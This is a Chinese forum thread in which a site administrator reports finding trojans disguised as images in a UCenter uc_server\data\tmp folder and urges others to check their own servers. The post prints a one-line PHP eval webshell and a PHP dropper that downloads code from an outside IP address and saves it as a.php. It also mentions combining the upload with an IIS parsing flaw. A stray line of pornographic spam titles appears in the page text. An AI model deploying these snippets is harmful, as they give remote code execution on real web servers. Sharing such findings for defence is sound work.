uc_server\data\tmp被上傳木馬文件建議自查

onlygod · 發表于 2019-11-14 16:53:32

今天網站搬家，順手用最新版的D盾掃描了一下，發現兩個可疑文件，圖片格式。

路徑為：uc_server\data\tmp

將格式圖片格式的后綴改為 .php，用記事本打開，發現一句話木馬，兩個文件分別如下：

<?php @eval($_POST['1']);?>

復制代碼

<script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt'); file_put_contents('a.php',$save) ;</script>

復制代碼

目前暫時沒掃出其他木馬，懷疑上傳木馬后并沒有成功執行。

文件名分別為：
upload37372
upload29060

后面的數字應該是用戶ID，建議將圖片改成隨機數字命名，否則容易被黑客利用。
IIS的解析漏洞，配合這個，有可能能拿下webshell。

-------建議大家自查一下。不知道新版有木有這個漏洞，知道的大神說下。

我知道答案回答被采納將會獲得1 貢獻已有1人回答

耗子 · 發表于 2019-11-14 17:43:13

這種情況一般都是頭像進來的，做好防護措施尤其服務器廣告IIS有這個漏洞包括這個是PHP的漏洞

香蕉成人伊视频在线观看|学生小视频国产区|yy女主播啪啪啪视频|麻豆传播媒体APP大全免费版官网|瑜伽牲交AV|国产欧美日韩在线天堂区|白浆精品国产91

[求助] uc_server\data\tmp被上傳木馬文件建議自查

相關帖子

產品服務

開發者服務

使用教程